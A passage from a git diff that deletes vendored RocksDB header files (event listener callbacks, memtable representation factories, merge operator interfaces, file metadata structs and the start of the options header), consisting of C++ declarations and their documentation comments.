-// or issue many of DB::Put() (as Put may be blocked in certain cases)
-// in the same thread in the EventListener callback. However, doing
-// DB::CompactFiles() and DB::Put() in a thread other than the
-// EventListener callback thread is considered safe.
-class EventListener {
- public:
-  // A call-back function to RocksDB which will be called whenever a
-  // registered RocksDB flushes a file.  The default implementation is
-  // no-op.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  virtual void OnFlushCompleted(DB* /*db*/,
-                                const FlushJobInfo& /*flush_job_info*/) {}
-
-  // A call-back function to RocksDB which will be called before a
-  // RocksDB starts to flush memtables.  The default implementation is
-  // no-op.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  virtual void OnFlushBegin(DB* /*db*/,
-                            const FlushJobInfo& /*flush_job_info*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a SST file is deleted.  Different from OnCompactionCompleted and
-  // OnFlushCompleted, this call-back is designed for external logging
-  // service and thus only provide string parameters instead
-  // of a pointer to DB.  Applications that build logic basic based
-  // on file creations and deletions is suggested to implement
-  // OnFlushCompleted and OnCompactionCompleted.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from the
-  // returned value.
-  virtual void OnTableFileDeleted(const TableFileDeletionInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a registered RocksDB compacts a file. The default implementation
-  // is a no-op.
-  //
-  // Note that this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns. Otherwise, RocksDB may be blocked.
-  //
-  // @param db a pointer to the rocksdb instance which just compacted
-  //   a file.
-  // @param ci a reference to a CompactionJobInfo struct. 'ci' is released
-  //  after this function is returned, and must be copied if it is needed
-  //  outside of this function.
-  virtual void OnCompactionCompleted(DB* /*db*/,
-                                     const CompactionJobInfo& /*ci*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a SST file is created.  Different from OnCompactionCompleted and
-  // OnFlushCompleted, this call-back is designed for external logging
-  // service and thus only provide string parameters instead
-  // of a pointer to DB.  Applications that build logic basic based
-  // on file creations and deletions is suggested to implement
-  // OnFlushCompleted and OnCompactionCompleted.
-  //
-  // Historically it will only be called if the file is successfully created.
-  // Now it will also be called on failure case. User can check info.status
-  // to see if it succeeded or not.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnTableFileCreated(const TableFileCreationInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a SST file is being created. It will follow by OnTableFileCreated after
-  // the creation finishes.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnTableFileCreationStarted(
-      const TableFileCreationBriefInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a memtable is made immutable.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnMemTableSealed(
-    const MemTableInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a column family handle is deleted.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  // @param handle is a pointer to the column family handle to be deleted
-  // which will become a dangling pointer after the deletion.
-  virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) {
-  }
-
-  // A call-back function for RocksDB which will be called after an external
-  // file is ingested using IngestExternalFile.
-  //
-  // Note that the this function will run on the same thread as
-  // IngestExternalFile(), if this function is blocked, IngestExternalFile()
-  // will be blocked from finishing.
-  virtual void OnExternalFileIngested(
-      DB* /*db*/, const ExternalFileIngestionInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before setting the
-  // background error status to a non-OK value. The new background error status
-  // is provided in `bg_error` and can be modified by the callback. E.g., a
-  // callback can suppress errors by resetting it to Status::OK(), thus
-  // preventing the database from entering read-only mode. We do not provide any
-  // guarantee when failed flushes/compactions will be rescheduled if the user
-  // suppresses an error.
-  //
-  // Note that this function can run on the same threads as flush, compaction,
-  // and user writes. So, it is extremely important not to perform heavy
-  // computations or blocking calls in this function.
-  virtual void OnBackgroundError(BackgroundErrorReason /* reason */,
-                                 Status* /* bg_error */) {}
-
-  // Factory method to return CompactionEventListener. If multiple listeners
-  // provides CompactionEventListner, only the first one will be used.
-  virtual CompactionEventListener* GetCompactionEventListener() {
-    return nullptr;
-  }
-
-  virtual ~EventListener() {}
-};
-
-#else
-
-class EventListener {
-};
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/memtablerep.h b/thirdparty/rocksdb/include/rocksdb/memtablerep.h
deleted file mode 100644
index 347dd30..0000000
--- a/thirdparty/rocksdb/include/rocksdb/memtablerep.h
+++ /dev/null
@@ -1,353 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file contains the interface that must be implemented by any collection
-// to be used as the backing store for a MemTable. Such a collection must
-// satisfy the following properties:
-//  (1) It does not store duplicate items.
-//  (2) It uses MemTableRep::KeyComparator to compare items for iteration and
-//     equality.
-//  (3) It can be accessed concurrently by multiple readers and can support
-//     during reads. However, it needn't support multiple concurrent writes.
-//  (4) Items are never deleted.
-// The liberal use of assertions is encouraged to enforce (1).
-//
-// The factory will be passed an MemTableAllocator object when a new MemTableRep
-// is requested.
-//
-// Users can implement their own memtable representations. We include three
-// types built in:
-//  - SkipListRep: This is the default; it is backed by a skip list.
-//  - HashSkipListRep: The memtable rep that is best used for keys that are
-//  structured like "prefix:suffix" where iteration within a prefix is
-//  common and iteration across different prefixes is rare. It is backed by
-//  a hash map where each bucket is a skip list.
-//  - VectorRep: This is backed by an unordered std::vector. On iteration, the
-// vector is sorted. It is intelligent about sorting; once the MarkReadOnly()
-// has been called, the vector will only be sorted once. It is optimized for
-// random-write-heavy workloads.
-//
-// The last four implementations are designed for situations in which
-// iteration over the entire collection is rare since doing so requires all the
-// keys to be copied into a sorted data structure.
-
-#pragma once
-
-#include <memory>
-#include <stdexcept>
-#include <stdint.h>
-#include <stdlib.h>
-
-namespace rocksdb {
-
-class Arena;
-class Allocator;
-class LookupKey;
-class Slice;
-class SliceTransform;
-class Logger;
-
-typedef void* KeyHandle;
-
-class MemTableRep {
- public:
-  // KeyComparator provides a means to compare keys, which are internal keys
-  // concatenated with values.
-  class KeyComparator {
-   public:
-    // Compare a and b. Return a negative value if a is less than b, 0 if they
-    // are equal, and a positive value if a is greater than b
-    virtual int operator()(const char* prefix_len_key1,
-                           const char* prefix_len_key2) const = 0;
-
-    virtual int operator()(const char* prefix_len_key,
-                           const Slice& key) const = 0;
-
-    virtual ~KeyComparator() { }
-  };
-
-  explicit MemTableRep(Allocator* allocator) : allocator_(allocator) {}
-
-  // Allocate a buf of len size for storing key. The idea is that a
-  // specific memtable representation knows its underlying data structure
-  // better. By allowing it to allocate memory, it can possibly put
-  // correlated stuff in consecutive memory area to make processor
-  // prefetching more efficient.
-  virtual KeyHandle Allocate(const size_t len, char** buf);
-
-  // Insert key into the collection. (The caller will pack key and value into a
-  // single buffer and pass that in as the parameter to Insert).
-  // REQUIRES: nothing that compares equal to key is currently in the
-  // collection, and no concurrent modifications to the table in progress
-  virtual void Insert(KeyHandle handle) = 0;
-
-  // Same as Insert(), but in additional pass a hint to insert location for
-  // the key. If hint points to nullptr, a new hint will be populated.
-  // otherwise the hint will be updated to reflect the last insert location.
-  //
-  // Currently only skip-list based memtable implement the interface. Other
-  // implementations will fallback to Insert() by default.
-  virtual void InsertWithHint(KeyHandle handle, void** hint) {
-    // Ignore the hint by default.
-    Insert(handle);
-  }
-
-  // Like Insert(handle), but may be called concurrent with other calls
-  // to InsertConcurrently for other handles
-  virtual void InsertConcurrently(KeyHandle handle) {
-#ifndef ROCKSDB_LITE
-    throw std::runtime_error("concurrent insert not supported");
-#else
-    abort();
-#endif
-  }
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* key) const = 0;
-
-  // Notify this table rep that it will no longer be added to. By default,
-  // does nothing.  After MarkReadOnly() is called, this table rep will
-  // not be written to (ie No more calls to Allocate(), Insert(),
-  // or any writes done directly to entries accessed through the iterator.)
-  virtual void MarkReadOnly() { }
-
-  // Look up key from the mem table, since the first key in the mem table whose
-  // user_key matches the one given k, call the function callback_func(), with
-  // callback_args directly forwarded as the first parameter, and the mem table
-  // key as the second parameter. If the return value is false, then terminates.
-  // Otherwise, go through the next key.
-  //
-  // It's safe for Get() to terminate after having finished all the potential
-  // key for the k.user_key(), or not.
-  //
-  // Default:
-  // Get() function with a default value of dynamically construct an iterator,
-  // seek and call the call back function.
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg, const char* entry));
-
-  virtual uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                         const Slice& end_key) {
-    return 0;
-  }
-
-  // Report an approximation of how much memory has been used other than memory
-  // that was allocated through the allocator.  Safe to call from any thread.
-  virtual size_t ApproximateMemoryUsage() = 0;
-
-  virtual ~MemTableRep() { }
-
-  // Iteration over the contents of a skip collection
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() {}
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const = 0;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const = 0;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() = 0;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() = 0;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key, const char* memtable_key) = 0;
-
-    // retreat to the first entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) = 0;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() = 0;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() = 0;
-  };
-
-  // Return an iterator over the keys in this representation.
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  virtual Iterator* GetIterator(Arena* arena = nullptr) = 0;
-
-  // Return an iterator that has a special Seek semantics. The result of
-  // a Seek might only include keys with the same prefix as the target key.
-  // arena: If not null, the arena is used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  virtual Iterator* GetDynamicPrefixIterator(Arena* arena = nullptr) {
-    return GetIterator(arena);
-  }
-
-  // Return true if the current MemTableRep supports merge operator.
-  // Default: true
-  virtual bool IsMergeOperatorSupported() const { return true; }
-
-  // Return true if the current MemTableRep supports snapshot
-  // Default: true
-  virtual bool IsSnapshotSupported() const { return true; }
-
- protected:
-  // When *key is an internal key concatenated with the value, returns the
-  // user key.
-  virtual Slice UserKey(const char* key) const;
-
-  Allocator* allocator_;
-};
-
-// This is the base class for all factories that are used by RocksDB to create
-// new MemTableRep objects
-class MemTableRepFactory {
- public:
-  virtual ~MemTableRepFactory() {}
-
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) = 0;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& key_cmp, Allocator* allocator,
-      const SliceTransform* slice_transform, Logger* logger,
-      uint32_t /* column_family_id */) {
-    return CreateMemTableRep(key_cmp, allocator, slice_transform, logger);
-  }
-
-  virtual const char* Name() const = 0;
-
-  // Return true if the current MemTableRep supports concurrent inserts
-  // Default: false
-  virtual bool IsInsertConcurrentlySupported() const { return false; }
-};
-
-// This uses a skip list to store keys. It is the default.
-//
-// Parameters:
-//   lookahead: If non-zero, each iterator's seek operation will start the
-//     search from the previously visited record (doing at most 'lookahead'
-//     steps). This is an optimization for the access pattern including many
-//     seeks with consecutive keys.
-class SkipListFactory : public MemTableRepFactory {
- public:
-  explicit SkipListFactory(size_t lookahead = 0) : lookahead_(lookahead) {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) override;
-  virtual const char* Name() const override { return "SkipListFactory"; }
-
-  bool IsInsertConcurrentlySupported() const override { return true; }
-
- private:
-  const size_t lookahead_;
-};
-
-#ifndef ROCKSDB_LITE
-// This creates MemTableReps that are backed by an std::vector. On iteration,
-// the vector is sorted. This is useful for workloads where iteration is very
-// rare and writes are generally not issued after reads begin.
-//
-// Parameters:
-//   count: Passed to the constructor of the underlying std::vector of each
-//     VectorRep. On initialization, the underlying array will be at least count
-//     bytes reserved for usage.
-class VectorRepFactory : public MemTableRepFactory {
-  const size_t count_;
-
- public:
-  explicit VectorRepFactory(size_t count = 0) : count_(count) { }
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator&,
-                                         Allocator*, const SliceTransform*,
-                                         Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "VectorRepFactory";
-  }
-};
-
-// This class contains a fixed array of buckets, each
-// pointing to a skiplist (null if the bucket is empty).
-// bucket_count: number of fixed array buckets
-// skiplist_height: the max height of the skiplist
-// skiplist_branching_factor: probabilistic size ratio between adjacent
-//                            link lists in the skiplist
-extern MemTableRepFactory* NewHashSkipListRepFactory(
-    size_t bucket_count = 1000000, int32_t skiplist_height = 4,
-    int32_t skiplist_branching_factor = 4
-);
-
-// The factory is to create memtables based on a hash table:
-// it contains a fixed array of buckets, each pointing to either a linked list
-// or a skip list if number of entries inside the bucket exceeds
-// threshold_use_skiplist.
-// @bucket_count: number of fixed array buckets
-// @huge_page_tlb_size: if <=0, allocate the hash table bytes from malloc.
-//                      Otherwise from huge page TLB. The user needs to reserve
-//                      huge pages for it to be allocated, like:
-//                          sysctl -w vm.nr_hugepages=20
-//                      See linux doc Documentation/vm/hugetlbpage.txt
-// @bucket_entries_logging_threshold: if number of entries in one bucket
-//                                    exceeds this number, log about it.
-// @if_log_bucket_dist_when_flash: if true, log distribution of number of
-//                                 entries when flushing.
-// @threshold_use_skiplist: a bucket switches to skip list if number of
-//                          entries exceed this parameter.
-extern MemTableRepFactory* NewHashLinkListRepFactory(
-    size_t bucket_count = 50000, size_t huge_page_tlb_size = 0,
-    int bucket_entries_logging_threshold = 4096,
-    bool if_log_bucket_dist_when_flash = true,
-    uint32_t threshold_use_skiplist = 256);
-
-// This factory creates a cuckoo-hashing based mem-table representation.
-// Cuckoo-hash is a closed-hash strategy, in which all key/value pairs
-// are stored in the bucket array itself intead of in some data structures
-// external to the bucket array.  In addition, each key in cuckoo hash
-// has a constant number of possible buckets in the bucket array.  These
-// two properties together makes cuckoo hash more memory efficient and
-// a constant worst-case read time.  Cuckoo hash is best suitable for
-// point-lookup workload.
-//
-// When inserting a key / value, it first checks whether one of its possible
-// buckets is empty.  If so, the key / value will be inserted to that vacant
-// bucket.  Otherwise, one of the keys originally stored in one of these
-// possible buckets will be "kicked out" and move to one of its possible
-// buckets (and possibly kicks out another victim.)  In the current
-// implementation, such "kick-out" path is bounded.  If it cannot find a
-// "kick-out" path for a specific key, this key will be stored in a backup
-// structure, and the current memtable to be forced to immutable.
-//
-// Note that currently this mem-table representation does not support
-// snapshot (i.e., it only queries latest state) and iterators.  In addition,
-// MultiGet operation might also lose its atomicity due to the lack of
-// snapshot support.
-//
-// Parameters:
-//   write_buffer_size: the write buffer size in bytes.
-//   average_data_size: the average size of key + value in bytes.  This value
-//     together with write_buffer_size will be used to compute the number
-//     of buckets.
-//   hash_function_count: the number of hash functions that will be used by
-//     the cuckoo-hash.  The number also equals to the number of possible
-//     buckets each key will have.
-extern MemTableRepFactory* NewHashCuckooRepFactory(
-    size_t write_buffer_size, size_t average_data_size = 64,
-    unsigned int hash_function_count = 4);
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/merge_operator.h b/thirdparty/rocksdb/include/rocksdb/merge_operator.h
deleted file mode 100644
index f294710..0000000
--- a/thirdparty/rocksdb/include/rocksdb/merge_operator.h
+++ /dev/null
@@ -1,232 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
-
-#include <deque>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class Slice;
-class Logger;
-
-// The Merge Operator
-//
-// Essentially, a MergeOperator specifies the SEMANTICS of a merge, which only
-// client knows. It could be numeric addition, list append, string
-// concatenation, edit data structure, ... , anything.
-// The library, on the other hand, is concerned with the exercise of this
-// interface, at the right time (during get, iteration, compaction...)
-//
-// To use merge, the client needs to provide an object implementing one of
-// the following interfaces:
-//  a) AssociativeMergeOperator - for most simple semantics (always take
-//    two values, and merge them into one value, which is then put back
-//    into rocksdb); numeric addition and string concatenation are examples;
-//
-//  b) MergeOperator - the generic class for all the more abstract / complex
-//    operations; one method (FullMergeV2) to merge a Put/Delete value with a
-//    merge operand; and another method (PartialMerge) that merges multiple
-//    operands together. this is especially useful if your key values have
-//    complex structures but you would still like to support client-specific
-//    incremental updates.
-//
-// AssociativeMergeOperator is simpler to implement. MergeOperator is simply
-// more powerful.
-//
-// Refer to rocksdb-merge wiki for more details and example implementations.
-//
-class MergeOperator {
- public:
-  virtual ~MergeOperator() {}
-
-  // Gives the client a way to express the read -> modify -> write semantics
-  // key:      (IN)    The key that's associated with this merge operation.
-  //                   Client could multiplex the merge operator based on it
-  //                   if the key space is partitioned and different subspaces
-  //                   refer to different types of data which have different
-  //                   merge operation semantics
-  // existing: (IN)    null indicates that the key does not exist before this op
-  // operand_list:(IN) the sequence of merge operations to apply, front() first.
-  // new_value:(OUT)   Client is responsible for filling the merge result here.
-  // The string that new_value is pointing to will be empty.
-  // logger:   (IN)    Client could use this to log errors during merge.
-  //
-  // Return true on success.
-  // All values passed in will be client-specific values. So if this method
-  // returns false, it is because client specified bad data or there was
-  // internal corruption. This will be treated as an error by the library.
-  //
-  // Also make use of the *logger for error messages.
-  virtual bool FullMerge(const Slice& key,
-                         const Slice* existing_value,
-                         const std::deque<std::string>& operand_list,
-                         std::string* new_value,
-                         Logger* logger) const {
-    // deprecated, please use FullMergeV2()
-    assert(false);
-    return false;
-  }
-
-  struct MergeOperationInput {
-    explicit MergeOperationInput(const Slice& _key,
-                                 const Slice* _existing_value,
-                                 const std::vector<Slice>& _operand_list,
-                                 Logger* _logger)
-        : key(_key),
-          existing_value(_existing_value),
-          operand_list(_operand_list),
-          logger(_logger) {}
-
-    // The key associated with the merge operation.
-    const Slice& key;
-    // The existing value of the current key, nullptr means that the
-    // value dont exist.
-    const Slice* existing_value;
-    // A list of operands to apply.
-    const std::vector<Slice>& operand_list;
-    // Logger could be used by client to log any errors that happen during
-    // the merge operation.
-    Logger* logger;
-  };
-
-  struct MergeOperationOutput {
-    explicit MergeOperationOutput(std::string& _new_value,
-                                  Slice& _existing_operand)
-        : new_value(_new_value), existing_operand(_existing_operand) {}
-
-    // Client is responsible for filling the merge result here.
-    std::string& new_value;
-    // If the merge result is one of the existing operands (or existing_value),
-    // client can set this field to the operand (or existing_value) instead of
-    // using new_value.
-    Slice& existing_operand;
-  };
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const;
-
-  // This function performs merge(left_op, right_op)
-  // when both the operands are themselves merge operation types
-  // that you would have passed to a DB::Merge() call in the same order
-  // (i.e.: DB::Merge(key,left_op), followed by DB::Merge(key,right_op)).
-  //
-  // PartialMerge should combine them into a single merge operation that is
-  // saved into *new_value, and then it should return true.
-  // *new_value should be constructed such that a call to
-  // DB::Merge(key, *new_value) would yield the same result as a call
-  // to DB::Merge(key, left_op) followed by DB::Merge(key, right_op).
-  //
-  // The string that new_value is pointing to will be empty.
-  //
-  // The default implementation of PartialMergeMulti will use this function
-  // as a helper, for backward compatibility.  Any successor class of
-  // MergeOperator should either implement PartialMerge or PartialMergeMulti,
-  // although implementing PartialMergeMulti is suggested as it is in general
-  // more effective to merge multiple operands at a time instead of two
-  // operands at a time.
-  //
-  // If it is impossible or infeasible to combine the two operations,
-  // leave new_value unchanged and return false. The library will
-  // internally keep track of the operations, and apply them in the
-  // correct order once a base-value (a Put/Delete/End-of-Database) is seen.
-  //
-  // TODO: Presently there is no way to differentiate between error/corruption
-  // and simply "return false". For now, the client should simply return
-  // false in any case it cannot perform partial-merge, regardless of reason.
-  // If there is corruption in the data, handle it in the FullMergeV2() function
-  // and return false there.  The default implementation of PartialMerge will
-  // always return false.
-  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
-                            const Slice& right_operand, std::string* new_value,
-                            Logger* logger) const {
-    return false;
-  }
-
-  // This function performs merge when all the operands are themselves merge
-  // operation types that you would have passed to a DB::Merge() call in the
-  // same order (front() first)
-  // (i.e. DB::Merge(key, operand_list[0]), followed by
-  //  DB::Merge(key, operand_list[1]), ...)
-  //
-  // PartialMergeMulti should combine them into a single merge operation that is
-  // saved into *new_value, and then it should return true.  *new_value should
-  // be constructed such that a call to DB::Merge(key, *new_value) would yield
-  // the same result as subquential individual calls to DB::Merge(key, operand)
-  // for each operand in operand_list from front() to back().
-  //
-  // The string that new_value is pointing to will be empty.
-  //
-  // The PartialMergeMulti function will be called when there are at least two
-  // operands.
-  //
-  // In the default implementation, PartialMergeMulti will invoke PartialMerge
-  // multiple times, where each time it only merges two operands.  Developers
-  // should either implement PartialMergeMulti, or implement PartialMerge which
-  // is served as the helper function of the default PartialMergeMulti.
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const;
-
-  // The name of the MergeOperator. Used to check for MergeOperator
-  // mismatches (i.e., a DB created with one MergeOperator is
-  // accessed using a different MergeOperator)
-  // TODO: the name is currently not stored persistently and thus
-  //       no checking is enforced. Client is responsible for providing
-  //       consistent MergeOperator between DB opens.
-  virtual const char* Name() const = 0;
-
-  // Determines whether the MergeOperator can be called with just a single
-  // merge operand.
-  // Override and return true for allowing a single operand. FullMergeV2 and
-  // PartialMerge/PartialMergeMulti should be implemented accordingly to handle
-  // a single operand.
-  virtual bool AllowSingleOperand() const { return false; }
-};
-
-// The simpler, associative merge operator.
-class AssociativeMergeOperator : public MergeOperator {
- public:
-  ~AssociativeMergeOperator() override {}
-
-  // Gives the client a way to express the read -> modify -> write semantics
-  // key:           (IN) The key that's associated with this merge operation.
-  // existing_value:(IN) null indicates the key does not exist before this op
-  // value:         (IN) the value to update/merge the existing_value with
-  // new_value:    (OUT) Client is responsible for filling the merge result
-  // here. The string that new_value is pointing to will be empty.
-  // logger:        (IN) Client could use this to log errors during merge.
-  //
-  // Return true on success.
-  // All values passed in will be client-specific values. So if this method
-  // returns false, it is because client specified bad data or there was
-  // internal corruption. The client should assume that this will be treated
-  // as an error by the library.
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const = 0;
-
-
- private:
-  // Default implementations of the MergeOperator functions
-  bool FullMergeV2(const MergeOperationInput& merge_in,
-                   MergeOperationOutput* merge_out) const override;
-
-  bool PartialMerge(const Slice& key, const Slice& left_operand,
-                    const Slice& right_operand, std::string* new_value,
-                    Logger* logger) const override;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/metadata.h b/thirdparty/rocksdb/include/rocksdb/metadata.h
deleted file mode 100644
index 37e7b50..0000000
--- a/thirdparty/rocksdb/include/rocksdb/metadata.h
+++ /dev/null
@@ -1,94 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-struct ColumnFamilyMetaData;
-struct LevelMetaData;
-struct SstFileMetaData;
-
-// The metadata that describes a column family.
-struct ColumnFamilyMetaData {
-  ColumnFamilyMetaData() : size(0), name("") {}
-  ColumnFamilyMetaData(const std::string& _name, uint64_t _size,
-                       const std::vector<LevelMetaData>&& _levels) :
-      size(_size), name(_name), levels(_levels) {}
-
-  // The size of this column family in bytes, which is equal to the sum of
-  // the file size of its "levels".
-  uint64_t size;
-  // The number of files in this column family.
-  size_t file_count;
-  // The name of the column family.
-  std::string name;
-  // The metadata of all levels in this column family.
-  std::vector<LevelMetaData> levels;
-};
-
-// The metadata that describes a level.
-struct LevelMetaData {
-  LevelMetaData(int _level, uint64_t _size,
-                const std::vector<SstFileMetaData>&& _files) :
-      level(_level), size(_size),
-      files(_files) {}
-
-  // The level which this meta data describes.
-  const int level;
-  // The size of this level in bytes, which is equal to the sum of
-  // the file size of its "files".
-  const uint64_t size;
-  // The metadata of all sst files in this level.
-  const std::vector<SstFileMetaData> files;
-};
-
-// The metadata that describes a SST file.
-struct SstFileMetaData {
-  SstFileMetaData() {}
-  SstFileMetaData(const std::string& _file_name, const std::string& _path,
-                  uint64_t _size, SequenceNumber _smallest_seqno,
-                  SequenceNumber _largest_seqno,
-                  const std::string& _smallestkey,
-                  const std::string& _largestkey, uint64_t _num_reads_sampled,
-                  bool _being_compacted)
-      : size(_size),
-        name(_file_name),
-        db_path(_path),
-        smallest_seqno(_smallest_seqno),
-        largest_seqno(_largest_seqno),
-        smallestkey(_smallestkey),
-        largestkey(_largestkey),
-        num_reads_sampled(_num_reads_sampled),
-        being_compacted(_being_compacted) {}
-
-  // File size in bytes.
-  uint64_t size;
-  // The name of the file.
-  std::string name;
-  // The full path where the file locates.
-  std::string db_path;
-
-  SequenceNumber smallest_seqno;  // Smallest sequence number in file.
-  SequenceNumber largest_seqno;   // Largest sequence number in file.
-  std::string smallestkey;     // Smallest user defined key in the file.
-  std::string largestkey;      // Largest user defined key in the file.
-  uint64_t num_reads_sampled;  // How many times the file is read.
-  bool being_compacted;  // true if the file is currently being compacted.
-};
-
-// The full set of metadata associated with each SST file.
-struct LiveFileMetaData : SstFileMetaData {
-  std::string column_family_name;  // Name of the column family
-  int level;               // Level at which this file resides.
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/options.h b/thirdparty/rocksdb/include/rocksdb/options.h
deleted file mode 100644
index 4d2f143..0000000
--- a/thirdparty/rocksdb/include/rocksdb/options.h
+++ /dev/null
@@ -1,1196 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
-#define STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
-
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <memory>
-#include <vector>
-#include <limits>
-#include <unordered_map>
-
-#include "rocksdb/advanced_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/universal_compaction.h"
-#include "rocksdb/version.h"
-#include "rocksdb/write_buffer_manager.h"
-
-#ifdef max
-#undef max
-#endif
-
-namespace rocksdb {
-
-class Cache;
-class CompactionFilter;
-class CompactionFilterFactory;
-class Comparator;
-class Env;
-enum InfoLogLevel : unsigned char;
-class SstFileManager;
-class FilterPolicy;
-class Logger;
-class MergeOperator;
-class Snapshot;
-class MemTableRepFactory;
-class RateLimiter;
-class Slice;
-class Statistics;
-class InternalKeyComparator;
-class WalFilter;
-
-// DB contents are stored in a set of blocks, each of which holds a
-// sequence of key,value pairs.  Each block may be compressed before
-// being stored in a file.  The following enum describes which
-// compression method (if any) is used to compress a block.
-enum CompressionType : unsigned char {
-  // NOTE: do not change the values of existing entries, as these are
-  // part of the persistent format on disk.
-  kNoCompression = 0x0,
-  kSnappyCompression = 0x1,
-  kZlibCompression = 0x2,
-  kBZip2Compression = 0x3,
-  kLZ4Compression = 0x4,
-  kLZ4HCCompression = 0x5,
-  kXpressCompression = 0x6,
-  kZSTD = 0x7,
-
-  // Only use kZSTDNotFinalCompression if you have to use ZSTD lib older than
-  // 0.8.0 or consider a possibility of downgrading the service or copying
-  // the database files to another service running with an older version of
